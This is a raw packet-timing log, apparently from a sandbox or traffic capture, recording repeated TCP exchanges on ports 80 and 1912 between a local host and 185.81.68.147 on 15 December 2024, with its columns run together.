                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.205662012 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.205723047 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.213589907 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.214631081 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.214694023 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.222161055 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.222213984 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.222275019 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.229911089 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.230010033 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.230065107 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.239058971 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.239097118 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.239202976 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.244157076 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.247742891 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.247888088 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.247953892 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.255893946 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.256239891 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.256319046 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.368516922 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.368731976 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.368798018 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.372541904 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.372725010 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.372787952 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.381099939 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.381289005 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.381340981 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.389700890 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.389738083 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.389812946 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.393552065 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.393640995 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.393707991 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.400234938 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.400253057 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.400377989 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.404284000 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.404452085 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.404512882 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.409039021 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.409063101 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.409126043 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.413856983 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.414180040 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.414282084 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.418764114 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.418945074 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.419007063 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.423744917 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.423780918 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.423839092 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.428388119 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.428577900 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.428884029 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.432511091 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.432544947 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.432652950 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.439877033 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.439913988 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.440001965 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.443259001 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.443294048 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.443387032 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.447047949 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.447103977 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.447185040 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.451864958 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.451951981 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.452028990 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.456722021 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.456821918 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.456885099 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.558773041 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.559793949 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.559895039 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.560081005 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.562170029 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.562231064 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.562299967 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.563932896 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.566915035 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.566994905 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.567143917 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.571638107 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.571695089 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.571804047 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.577126026 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.577270985 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.577328920 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.581552982 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.581708908 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.581927061 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.585644960 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.585968971 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.586030960 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.589838028 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.590024948 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.590172052 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.593760967 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.593904972 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.593952894 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.597507954 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.597695112 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.597747087 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.601569891 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.601736069 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.601789951 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.605487108 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.605678082 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.605736017 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.609321117 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.609510899 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.609564066 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.612396002 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.612508059 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.612561941 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.617362976 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.617546082 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.617603064 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.621205091 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.621380091 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.621453047 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.625148058 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.625346899 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.625458956 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.629070044 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.629276991 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.629349947 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.632110119 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.632145882 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.632208109 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.636202097 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.636285067 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.636455059 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.639942884 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.639995098 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.640081882 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.643846989 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.643934965 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.643994093 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.647711992 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.647840977 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.647905111 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.651562929 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.651679993 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.651741982 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.655637980 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.655673981 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.655730009 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.659416914 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.659607887 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.659672976 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.663431883 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.663552999 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.663611889 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.667730093 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.667862892 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.667968988 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.671796083 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.683707952 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.718759060 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.752017021 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.752089977 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.752192020 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.753743887 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.753818035 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.753868103 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.757020950 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.757177114 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.757227898 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.760442972 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.760577917 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.760633945 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.763617992 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.763775110 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.763823032 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.766750097 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.766855001 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.766933918 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.769819021 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.770028114 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.770081043 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.772861004 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.772996902 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.773061037 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.776041985 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.776148081 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.776192904 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.778736115 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.778887033 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.778934002 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.781636000 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.781685114 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.781748056 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.784379005 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.784491062 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.784545898 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.787166119 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.787317038 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.787575960 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.789911032 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.790144920 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.790196896 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.792676926 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.792690039 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.792745113 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.795247078 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.795368910 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.795417070 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.797935009 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.798012018 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.798070908 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.800663948 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.800954103 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.801001072 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.803569078 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.803669930 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.803726912 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.806309938 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.806396961 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.806591034 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.808801889 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.808813095 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.808865070 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.811131954 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.811378956 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.811430931 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.813764095 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.813925982 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.813970089 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.816416979 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.816428900 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.816487074 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.819108009 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.819120884 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.819200993 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.821809053 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.821820021 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.821873903 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.824351072 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.824403048 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.824462891 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.827147007 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.827158928 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.827214003 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.829579115 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.829654932 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.829710007 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.832197905 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.832268000 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.832319021 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.834918976 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.835022926 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.835077047 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.837436914 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.837585926 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.837680101 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.840225935 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.840354919 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.840420961 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.842824936 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.842931986 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.842983961 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.845438004 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.845576048 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.845635891 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.848028898 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.848092079 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.848145008 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.850671053 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.850775003 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.850825071 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.853319883 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.853372097 CET8049720185.81.68.147192.168.2.5
